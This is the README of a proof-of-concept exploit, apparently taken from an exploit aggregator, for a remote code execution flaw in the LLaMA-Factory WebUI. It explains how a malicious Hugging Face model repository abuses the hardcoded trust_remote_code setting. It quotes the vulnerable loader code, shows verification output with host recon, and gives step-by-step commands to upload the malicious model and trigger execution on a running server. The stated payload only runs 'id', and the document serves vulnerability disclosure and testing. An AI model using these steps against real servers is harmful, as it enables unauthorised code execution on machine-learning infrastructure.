## https://sploitus.com/exploit?id=5FAFE7AF-9ADD-5A87-8223-328B9E22885E
# CVE-2026-58116 โ LLaMA-Factory WebUI RCE via `trust_remote_code`
Proof of concept for **CVE-2026-58116** (CVSS 9.8 Critical): remote code execution
in [LLaMA-Factory](https://github.com/hiyouga/LLaMA-Factory) `<= v0.9.5`.
The LLaMA-Factory WebUI hardcodes `trust_remote_code=True` when loading a model
(`src/llamafactory/webui/chatter.py:139` and `runner.py:175,320`). The
attacker-controlled "Model path" field flows unvalidated into
`AutoTokenizer.from_pretrained()` / `AutoModel.from_pretrained()`, so the
Hugging Face `transformers` library downloads and **executes arbitrary Python**
from a malicious model repository.
## โ ๏ธ Educational Use Only
This PoC is for authorized security testing and education only. The included
payload is intentionally harmless (it prints host recon via `id`). Only run it
against systems you own or are authorized to test. Never deploy a malicious
payload against infrastructure without explicit permission.
## Contents
```
.
โโโ poc-model/
โ โโโ config.json # declares auto_map โ attacker modules
โ โโโ configuration_poc.py # payload: runs os.system("id ...") at config load
โ โโโ modeling_poc.py # minimal stub model class
โ โโโ __init__.py # makes it an importable package
โโโ build_and_verify.py # assemble + verify the sink in isolation
```
## How the sink works
`transformers` instantiates the config class **before** loading any weights, so
the payload in `PoCConfig.__init__` fires as soon as the config is read โ no
weights need to exist. That is exactly the path LLaMA-Factory reaches through
`src/llamafactory/model/loader.py`:
```python
def _get_init_kwargs(model_args):
return {"trust_remote_code": model_args.trust_remote_code, ...} # True (hardcoded)
def load_tokenizer(model_args):
init_kwargs = _get_init_kwargs(model_args)
tokenizer = AutoTokenizer.from_pretrained(model_args.model_name_or_path, **init_kwargs)
```
## Quick start
**Verify the sink locally** (no WebUI needed โ proves the contract the WebUI
violates):
```bash
pip install transformers torch
python3 build_and_verify.py
```
Expected output โ notice the payload banner appears *during* config load:
```
[+] PoC model assembled at .../poc-model
[*] Loading config with trust_remote_code=True (this triggers the PoC)...
============================================================
[CVE-2026-58116 PoC] trust_remote_code payload executed!
time : 2026-07-02T...
host : gpu-host-01
user : hbuser
------------------------------------------------------------
uid=1000(hbuser) gid=1000(hbuser) groups=1000(hbuser)
============================================================
[+] Config loaded: PoCConfig (model_type=poc_model)
```
**End-to-end via a running LLaMA-Factory WebUI:**
1. Upload the PoC model to the Hub:
```bash
huggingface-cli login
python3 build_and_verify.py --upload your-user/llmfcty-poc
```
2. Launch an affected LLaMA-Factory board: `llamafactory-cli webui`
3. Open the Chat tab, set **Model path** to `your-user/llmfcty-poc`, click **Load Model**.
4. The payload executes on the server as the LLaMA-Factory process.
## References
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-58116
- VulnCheck advisory: https://www.vulncheck.com/advisories/llama-factory-remote-code-execution-via-webui-model-path
- Original disclosure (h3nrrrych4u): https://gist.github.com/henrrrychau/08d76ec672f42136bbc1449c4f2973f8